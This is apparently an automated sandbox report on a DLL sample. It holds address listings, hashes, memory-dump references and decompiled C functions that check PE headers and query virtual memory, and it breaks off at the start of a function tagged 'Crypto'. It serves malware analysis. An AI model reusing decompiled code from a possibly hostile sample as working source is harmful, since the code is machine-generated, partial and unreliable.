                    0x010c6eb6
                    0x010c6eb9
                    0x010c6ed3
                    0x010c6ed6
                    0x010c6eee
                    0x010c6ef1
                    0x010c6f07
                    0x010c6f0a
                    0x010c6f22
                    0x010c6f25
                    0x010c6f3d
                    0x010c6f40
                    0x010c6f5a
                    0x010c6f5d
                    0x010c6f73
                    0x010c6f76
                    0x010c6f8e
                    0x010c6f91
                    0x010c6fab
                    0x010c6fae
                    0x010c6fc6
                    0x010c6fc9
                    0x010c6fdf
                    0x010c6fe2
                    0x010c6ffa
                    0x010c6ffd
                    0x010c7015
                    0x010c7018
                    0x010c702a
                    0x010c702d
                    0x010c703f
                    0x010c7042
                    0x010c7054
                    0x010c7057
                    0x010c705b
                    0x010c706b
                    0x010c706e
                    0x010c707c
                    0x010c707f
                    0x010c7091
                    0x010c7094
                    0x010c70a8
                    0x010c70ab
                    0x010c70ad
                    0x010c70bd
                    0x010c70c0
                    0x010c70d2
                    0x010c70d5
                    0x010c70e3
                    0x010c70e6
                    0x010c70f8
                    0x010c70fb
                    0x010c70ff
                    0x010c710f
                    0x010c7112
                    0x010c7124
                    0x010c7127
                    0x010c7135
                    0x010c7138
                    0x010c714a
                    0x010c714d
                    0x010c715f
                    0x010c7162
                    0x010c7176
                    0x010c7179
                    0x010c718d
                    0x010c7190
                    0x010c71a4
                    0x010c71a7
                    0x010c71bb
                    0x010c71be
                    0x010c71d2
                    0x010c71d5
                    0x010c71e9
                    0x010c71ee
                    0x010c7200
                    0x010c7203
                    0x010c7217
                    0x010c721a
                    0x010c722e
                    0x010c7231
                    0x010c7247
                    0x010c724a
                    0x010c725e
                    0x010c7261
                    0x010c7273
                    0x010c7276
                    0x010c728a
                    0x010c728d
                    0x010c72a1
                    0x010c72a4
                    0x010c72b8
                    0x010c72c1
                    0x010c72c4
                    0x010c72cd
                    0x010c72d6
                    0x010c72de
                    0x010c72e6
                    0x010c72f0
                    0x010c7305

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memset
                    • String ID:
                    • API String ID: 2221118986-0
                    • Opcode ID: 02f01188f833f941e0481689e8a11b22f52e1a58a4b4f1c0ee04314728193f86
                    • Instruction ID: 6d3f611f9f5517425cfbefa895abe0740a50c376596bbbcdb829b26dad3dc5a5
                    • Opcode Fuzzy Hash: 02f01188f833f941e0481689e8a11b22f52e1a58a4b4f1c0ee04314728193f86
                    • Instruction Fuzzy Hash: 9922857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002465 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E10002465(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x100041f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x10004240 = 1;
										__eflags =  *0x10004240;
										if( *0x10004240 != 0) {
											goto L60;
										}
										_t84 =  *0x100041f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x10004240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x100041f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x100041fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x10004240 = 1;
							__eflags =  *0x10004240;
							if( *0x10004240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x10004240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x100041f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                    0x1000246f
                    0x10002472
                    0x10002478
                    0x10002496
                    0x00000000
                    0x10002496
                    0x10002480
                    0x10002489
                    0x1000248f
                    0x1000249e
                    0x100024a1
                    0x100024a4
                    0x100024ae
                    0x100024ae
                    0x100024b0
                    0x100024b3
                    0x100024b5
                    0x100024b5
                    0x100024b7
                    0x100024ba
                    0x00000000
                    0x00000000
                    0x100024bc
                    0x100024be
                    0x10002524
                    0x10002524
                    0x10002682
                    0x00000000
                    0x10002682
                    0x100024c0
                    0x100024c0
                    0x100024c4
                    0x100024c6
                    0x100024c6
                    0x100024c6
                    0x100024c6
                    0x100024c9
                    0x100024ca
                    0x100024cd
                    0x100024cd
                    0x100024d1
                    0x100024d5
                    0x100024e3
                    0x100024e3
                    0x100024eb
                    0x100024f1
                    0x100024f3
                    0x100024f5
                    0x10002505
                    0x10002512
                    0x10002516
                    0x1000251b
                    0x1000251d
                    0x1000259b
                    0x1000259b
                    0x1000251f
                    0x1000251f
                    0x1000251f
                    0x1000259d
                    0x1000259f
                    0x10002680
                    0x10002680
                    0x00000000
                    0x100025a5
                    0x100025a5
                    0x100025ac
                    0x00000000
                    0x00000000
                    0x100025b2
                    0x100025b6
                    0x10002612
                    0x10002614
                    0x1000261c
                    0x1000261e
                    0x10002620
                    0x00000000
                    0x00000000
                    0x10002622
                    0x10002628
                    0x1000262a
                    0x1000262c
                    0x10002641
                    0x10002641
                    0x10002643
                    0x10002672
                    0x10002679
                    0x00000000
                    0x10002679
                    0x10002647
                    0x10002648
                    0x1000264a
                    0x1000264c
                    0x1000264c
                    0x1000264e
                    0x10002650
                    0x10002652
                    0x10002666
                    0x10002666
                    0x10002669
                    0x1000266b
                    0x1000266b
                    0x1000266c
                    0x1000266c
                    0x00000000
                    0x10002654
                    0x10002654
                    0x10002654
                    0x1000265d
                    0x1000265e
                    0x10002660
                    0x10002662
                    0x10002662
                    0x00000000
                    0x10002654
                    0x10002652
                    0x1000262e
                    0x10002635
                    0x10002635
                    0x10002637
                    0x00000000
                    0x00000000
                    0x10002639
                    0x1000263a
                    0x1000263d
                    0x1000263f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x1000263f
                    0x00000000
                    0x10002635
                    0x100025b8
                    0x100025bb
                    0x100025c0
                    0x00000000
                    0x00000000
                    0x100025c9
                    0x100025cb
                    0x100025d1
                    0x00000000
                    0x00000000
                    0x100025d7
                    0x100025dd
                    0x00000000
                    0x00000000
                    0x100025e3
                    0x100025e5
                    0x100025ee
                    0x100025f2
                    0x00000000
                    0x00000000
                    0x100025f8
                    0x100025fb
                    0x100025fd
                    0x00000000
                    0x00000000
                    0x10002604
                    0x10002606
                    0x00000000
                    0x00000000
                    0x10002608
                    0x1000260c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x1000260c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x100024f7
                    0x100024f7
                    0x100024f7
                    0x100024fe
                    0x00000000
                    0x00000000
                    0x10002500
                    0x10002501
                    0x10002503
                    0x00000000
                    0x00000000
                    0x00000000
                    0x10002503
                    0x1000252b
                    0x1000252d
                    0x00000000
                    0x00000000
                    0x1000253d
                    0x1000253f
                    0x10002541
                    0x00000000
                    0x00000000
                    0x10002547
                    0x1000254e
                    0x1000257a
                    0x1000257a
                    0x1000257c
                    0x1000257e
                    0x10002592
                    0x10002594
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x10002580
                    0x10002580
                    0x10002580
                    0x10002589
                    0x1000258a
                    0x1000258c
                    0x1000258e
                    0x1000258e
                    0x00000000
                    0x10002580
                    0x10002550
                    0x10002553
                    0x10002555
                    0x10002567
                    0x10002567
                    0x1000256a
                    0x1000256c
                    0x1000256c
                    0x1000256d
                    0x1000256d
                    0x10002573
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x10002557
                    0x10002557
                    0x10002557
                    0x1000255e
                    0x00000000
                    0x00000000
                    0x10002560
                    0x10002560
                    0x10002561
                    0x00000000
                    0x00000000
                    0x00000000
                    0x10002561
                    0x10002563
                    0x10002565
                    0x10002578
                    0x00000000
                    0x00000000
                    0x00000000
                    0x10002578
                    0x00000000
                    0x10002565
                    0x100024d7
                    0x100024da
                    0x100024dd
                    0x00000000
                    0x00000000
                    0x100024df
                    0x100024e1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x100024e1
                    0x100024a6
                    0x100024a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002516
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: MemoryQueryVirtual
                    • String ID:
                    • API String ID: 2850889275-0
                    • Opcode ID: e82cc25a9865243328718712b27d63dbee3012df9f57b2ff4402805c788c56e2
                    • Instruction ID: 14679f403e1a73c796a36ca75824cbc8d84e36d656f85ef4f4c7f83bccd55f0c
                    • Opcode Fuzzy Hash: e82cc25a9865243328718712b27d63dbee3012df9f57b2ff4402805c788c56e2
                    • Instruction Fuzzy Hash: 1D61FD30B00A528FFB19CF28DCE065933E5EB853D5B268568D856C729DEB32DC86C644
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C8401 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C8401(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10ca380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x10ca3c8 = 1;
										__eflags =  *0x10ca3c8;
										if( *0x10ca3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x10ca380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x10ca3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10ca380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10ca388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x10ca384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10ca388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10ca388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x10ca3c8 = 1;
							__eflags =  *0x10ca3c8;
							if( *0x10ca3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10ca388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10ca388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x10ca3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10ca388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10ca380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10ca388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10ca388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                    0x010c840b
                    0x010c840e
                    0x010c8414
                    0x010c8432
                    0x00000000
                    0x010c8432
                    0x010c841c
                    0x010c8425
                    0x010c842b
                    0x010c843a
                    0x010c843d
                    0x010c8440
                    0x010c844a
                    0x010c844a
                    0x010c844c
                    0x010c844f
                    0x010c8451
                    0x010c8451
                    0x010c8453
                    0x010c8456
                    0x00000000
                    0x00000000
                    0x010c8458
                    0x010c845a
                    0x010c84c0
                    0x010c84c0
                    0x010c861e
                    0x00000000
                    0x010c861e
                    0x010c845c
                    0x010c845c
                    0x010c8460
                    0x010c8462
                    0x010c8462
                    0x010c8462
                    0x010c8462
                    0x010c8465
                    0x010c8466
                    0x010c8469
                    0x010c8469
                    0x010c846d
                    0x010c8471
                    0x010c847f
                    0x010c847f
                    0x010c8487
                    0x010c848d
                    0x010c848f
                    0x010c8491
                    0x010c84a1
                    0x010c84ae
                    0x010c84b2
                    0x010c84b7
                    0x010c84b9
                    0x010c8537
                    0x010c8537
                    0x010c84bb
                    0x010c84bb
                    0x010c84bb
                    0x010c8539
                    0x010c853b
                    0x010c861c
                    0x010c861c
                    0x00000000
                    0x010c8541
                    0x010c8541
                    0x010c8548
                    0x00000000
                    0x00000000
                    0x010c854e
                    0x010c8552
                    0x010c85ae
                    0x010c85b0
                    0x010c85b8
                    0x010c85ba
                    0x010c85bc
                    0x00000000
                    0x00000000
                    0x010c85be
                    0x010c85c4
                    0x010c85c6
                    0x010c85c8
                    0x010c85dd
                    0x010c85dd
                    0x010c85df
                    0x010c860e
                    0x010c8615
                    0x00000000
                    0x010c8615
                    0x010c85e3
                    0x010c85e4
                    0x010c85e6
                    0x010c85e8
                    0x010c85e8
                    0x010c85ea
                    0x010c85ec
                    0x010c85ee
                    0x010c8602
                    0x010c8602
                    0x010c8605
                    0x010c8607
                    0x010c8607
                    0x010c8608
                    0x010c8608
                    0x00000000
                    0x010c85f0
                    0x010c85f0
                    0x010c85f0
                    0x010c85f9
                    0x010c85fa
                    0x010c85fc
                    0x010c85fe
                    0x010c85fe
                    0x00000000
                    0x010c85f0
                    0x010c85ee
                    0x010c85ca
                    0x010c85d1
                    0x010c85d1
                    0x010c85d3
                    0x00000000
                    0x00000000
                    0x010c85d5
                    0x010c85d6
                    0x010c85d9
                    0x010c85db
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c85db
                    0x00000000
                    0x010c85d1
                    0x010c8554
                    0x010c8557
                    0x010c855c
                    0x00000000
                    0x00000000
                    0x010c8565
                    0x010c8567
                    0x010c856d
                    0x00000000
                    0x00000000
                    0x010c8573
                    0x010c8579
                    0x00000000
                    0x00000000
                    0x010c857f
                    0x010c8581
                    0x010c858a
                    0x010c858e
                    0x00000000
                    0x00000000
                    0x010c8594
                    0x010c8597
                    0x010c8599
                    0x00000000
                    0x00000000
                    0x010c85a0
                    0x010c85a2
                    0x00000000
                    0x00000000
                    0x010c85a4
                    0x010c85a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c85a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c8493
                    0x010c8493
                    0x010c8493
                    0x010c849a
                    0x00000000
                    0x00000000
                    0x010c849c
                    0x010c849d
                    0x010c849f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c849f
                    0x010c84c7
                    0x010c84c9
                    0x00000000
                    0x00000000
                    0x010c84d9
                    0x010c84db
                    0x010c84dd
                    0x00000000
                    0x00000000
                    0x010c84e3
                    0x010c84ea
                    0x010c8516
                    0x010c8516
                    0x010c8518
                    0x010c851a
                    0x010c852e
                    0x010c8530
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c851c
                    0x010c851c
                    0x010c851c
                    0x010c8525
                    0x010c8526
                    0x010c8528
                    0x010c852a
                    0x010c852a
                    0x00000000
                    0x010c851c
                    0x010c84ec
                    0x010c84ec
                    0x010c84ef
                    0x010c84f1
                    0x010c8503
                    0x010c8503
                    0x010c8506
                    0x010c8508
                    0x010c8508
                    0x010c8509
                    0x010c8509
                    0x010c850f
                    0x010c850f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c84f3
                    0x010c84f3
                    0x010c84f3
                    0x010c84fa
                    0x00000000
                    0x00000000
                    0x010c84fc
                    0x010c84fc
                    0x010c84fd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c84fd
                    0x010c84ff
                    0x010c8501
                    0x010c8514
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c8514
                    0x00000000
                    0x010c8501
                    0x010c8473
                    0x010c8476
                    0x010c8479
                    0x00000000
                    0x00000000
                    0x010c847b
                    0x010c847d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c847d
                    0x010c8442
                    0x010c8444
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 010C84B2
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: MemoryQueryVirtual
                    • String ID:
                    • API String ID: 2850889275-0
                    • Opcode ID: 6cf311b107776e8250562978ac5b7c47baf70df88346434c16f394fc5c2d1e29
                    • Instruction ID: f82dff0cb8e0718035d84c9ed46756083a7e98023f396d2bf846468626239926
                    • Opcode Fuzzy Hash: 6cf311b107776e8250562978ac5b7c47baf70df88346434c16f394fc5c2d1e29
                    • Instruction Fuzzy Hash: 6B61D4307002168FDB6ACF2CC49466D77E1BB85B54B28C5AFE9C5C7189EB75D8428F48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002244 Relevance: .1, Instructions: 77COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E10002244(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
